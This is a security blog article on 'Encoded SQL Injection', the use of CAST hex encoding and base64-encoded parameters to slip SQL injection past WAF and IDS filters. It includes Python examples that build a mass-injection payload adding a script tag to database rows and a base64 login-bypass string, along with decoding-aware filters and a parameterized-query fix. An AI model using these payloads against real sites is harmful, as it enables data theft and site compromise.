Encoded SQL Injection vulnerabilities

22:48 25.12.2010

This is the English version of my article Encoded SQL Injection vulnerabilities.

In the article Advanced methods of SQL Smuggling I mentioned Encoded SQL Injection, a new class of SQL Injection that I found in 2009 (that is, a subclass of SQL Injection vulnerabilities). Now I will describe it in detail.

Last year, on 17.05.2009, I found an SQLi vulnerability that I assigned to a new type of SQL Injection: Encoded SQL Injection. I have already written many times about Encrypted XSS (Encoded XSS), and in this article I will cover Encoded SQLi. In my classification of SQL Injection vulnerabilities (2008) I gave two types of SQLi, Reflected SQL Injection and Persistent SQL Injection. Encoded SQL Injection is the third type.

These vulnerabilities allow an attacker to bypass protection systems, both the protection filters built into the web application and the IDS, IPS and WAF systems installed on the server. That is why I classified this type of SQL Injection among the advanced methods of SQL Smuggling.

Types of Encoded SQL Injection.

There are the following types of Encoded SQL Injection:

  • Partly encoded SQLi.
  • Completely encoded SQLi.

The first type can still be detected by some protection systems (if they are tuned to the relevant SQL operators), but the second type will not be detected at all by current protection systems, except those which support decoding of the encoding used.

Partly encoded SQLi.

In partly encoded SQL Injection, the data sent to the DBMS is encoded only in part: only some portion of the SQL code is encoded (e.g. via CAST). Encoding of strings to bypass quote filtering does not belong to this type.

As in the case mentioned in the post Encoded SQL Injection, where this type of SQLi was used for an attack on a site (through an ordinary SQLi vulnerability):

DECLARE @S NVARCHAR(4000);SET @S=CAST(…
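As an added illustration (not code from the original article), the following Python helper shows how the DECLARE/CAST/EXEC wrapper above carries an arbitrary T-SQL statement as a hex literal (the NVARCHAR bytes, i.e. UTF-16LE), why a keyword filter that only looks for data-manipulation keywords misses it, and why a filter tuned to the CAST/EXEC/DECLARE operators still catches it. The inner statement, both signature lists and all function names are constructed for this example.

```python
import re
from typing import List, Optional

# Added example: wrap a T-SQL statement the way the partly encoded payload
# above does. The hex literal is the statement as NVARCHAR (UTF-16LE bytes),
# so the SQL keywords of the inner statement never appear in clear text.
def encode_tsql_cast(statement: str) -> str:
    hex_literal = "0x" + statement.encode("utf-16-le").hex().upper()
    return ("DECLARE @S NVARCHAR(4000);"
            f"SET @S=CAST({hex_literal} AS NVARCHAR(4000));"
            "EXEC(@S);")

# What a decoding-aware filter (or an analyst reading logs) has to do to see
# the real statement: pull the hex literal out of CAST(...) and decode it.
CAST_HEX_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+NVARCHAR\(\d+\)\)",
                         re.IGNORECASE)

def decode_tsql_cast(payload: str) -> Optional[str]:
    m = CAST_HEX_RE.search(payload)
    if m is None:
        return None
    return bytes.fromhex(m.group(1)).decode("utf-16-le")

# Two hypothetical signature sets for a keyword-based filter (constructed).
# The first looks only for data-manipulation keywords; the second also covers
# the operators that the CAST wrapper itself cannot hide.
DML_SIGNATURES = [r"\bUNION\b", r"\bSELECT\b", r"\bUPDATE\b",
                  r"\bINSERT\b", r"\bDELETE\b"]
OPERATOR_SIGNATURES = DML_SIGNATURES + [r"\bDECLARE\b", r"\bCAST\s*\(",
                                        r"\bEXEC\s*\("]

def flagged(text: str, signatures: List[str]) -> List[str]:
    """Return the signatures that match `text` (case-insensitive)."""
    return [s for s in signatures if re.search(s, text, re.IGNORECASE)]

# Constructed inner statement of the kind used in mass-injection attacks:
# appends a script tag to every row of a text column.
INNER_STATEMENT = ("UPDATE news SET body = body + "
                   "'<script src=\"http://example.com/x.js\"></script>'")
ENCODED_PAYLOAD = encode_tsql_cast(INNER_STATEMENT)

if __name__ == "__main__":
    print(ENCODED_PAYLOAD)
    print("plain statement, DML filter:   ", flagged(INNER_STATEMENT, DML_SIGNATURES))
    print("encoded payload, DML filter:   ", flagged(ENCODED_PAYLOAD, DML_SIGNATURES))
    print("encoded payload, operator filter:", flagged(ENCODED_PAYLOAD, OPERATOR_SIGNATURES))
    print("decoded inner statement:       ", decode_tsql_cast(ENCODED_PAYLOAD))
```

The hex literal can only contain the characters 0-9 and A-F, so no keyword with another letter in it can ever match inside it; that is exactly why a DML-keyword filter sees nothing, while DECLARE, CAST( and EXEC( remain in clear text and give a filter tuned to them something to match.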

Completely encoded SQLi.

In completely encoded SQL Injection, the data sent to the DBMS is encoded completely: the whole SQL query is encoded (at the interface level) and is decoded only at the web application level before being sent to the DBMS. In particular, in the variant of Encoded SQL Injection that I found last year, base64 encoding is used.

When a web application accepts its parameter values as base64 strings (decoding them on the server before use), this can be used to conduct Encoded SQLi attacks.

For example, the string ' or 1=1# becomes JyBvciAxPTEj, and the string ' and 1='1 becomes JyBhbmQgMT0nMQ==.

At the level of external protection systems that do not support decoding of the data sent to the web application, these and other encoded strings raise no suspicion. IDS, IPS and WAF systems installed on the server will not be able to detect such attacks (and they will be hard to find in the logs), so the attacks pass, successfully bypassing the protection systems.
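The following Python/SQLite example is added here and is not from the original article. It reproduces the completely encoded case end to end: a request filter that inspects only the raw parameter, an application lookup that base64-decodes the parameter and concatenates it into a query, and the two fixes a practitioner would want, a filter that decodes before inspecting, and a parameterized query so that the encoding no longer matters. The filter patterns, table, rows and function names are constructed for this example. SQLite has no # comment, so the payload uses the quote-balanced form ' or '1'='1 rather than the #-terminated string shown above.

```python
import base64
import binascii
import re
import sqlite3

# Hypothetical naive request filter (constructed): inspects the raw parameter
# value exactly as it appears in the request, which is what an external
# IDS/IPS/WAF without base64 support sees.
RAW_FILTER_PATTERNS = [r"'\s*(or|and)\b", r"#", r"--", r"\bunion\b", r"\bselect\b"]

def filter_allows(value: str) -> bool:
    """True if no signature matches the value as sent."""
    return not any(re.search(p, value, re.IGNORECASE) for p in RAW_FILTER_PATTERNS)

def filter_allows_decoded(value: str) -> bool:
    """Decoding-aware variant: also inspect the value after base64 decoding."""
    if not filter_allows(value):
        return False
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return True  # not base64 text; the raw inspection already passed
    return filter_allows(decoded)

def encode_param(value: str) -> str:
    """Client side: the application expects its parameter values as base64."""
    return base64.b64encode(value.encode("utf-8")).decode("ascii")

def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return conn

def vulnerable_lookup(conn: sqlite3.Connection, encoded_login: str):
    # The application decodes only after the perimeter filter has seen the
    # request, then concatenates the decoded text straight into the query.
    login = base64.b64decode(encoded_login).decode("utf-8")
    sql = "SELECT id, login FROM users WHERE login = '" + login + "' ORDER BY id"
    return conn.execute(sql).fetchall()

def hardened_lookup(conn: sqlite3.Connection, encoded_login: str):
    # Same decoding step, but the value travels as a bound parameter, so the
    # DBMS never parses it as SQL whatever encoding it arrived in.
    login = base64.b64decode(encoded_login).decode("utf-8")
    return conn.execute("SELECT id, login FROM users WHERE login = ? ORDER BY id",
                        (login,)).fetchall()

# Constructed attack value and its encoded form (what the WAF actually sees).
PAYLOAD = "' or '1'='1"
ENCODED_PAYLOAD = encode_param(PAYLOAD)

if __name__ == "__main__":
    conn = build_db()
    print("encoded parameter:", ENCODED_PAYLOAD)
    print("raw-only filter allows it:      ", filter_allows(ENCODED_PAYLOAD))
    print("decoding-aware filter allows it:", filter_allows_decoded(ENCODED_PAYLOAD))
    print("vulnerable lookup returns:", vulnerable_lookup(conn, ENCODED_PAYLOAD))
    print("hardened lookup returns:  ", hardened_lookup(conn, ENCODED_PAYLOAD))
    print("hardened lookup, normal user:", hardened_lookup(conn, encode_param("bob")))
```

The raw-only filter passes JyBvciAnMSc9JzE= because none of its signatures can match a base64 alphabet string, and the concatenating lookup then returns every row. Decoding before inspection closes the detection gap, but the parameterized query is the real fix: it removes the injection regardless of whether the perimeter ever learns the encoding.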

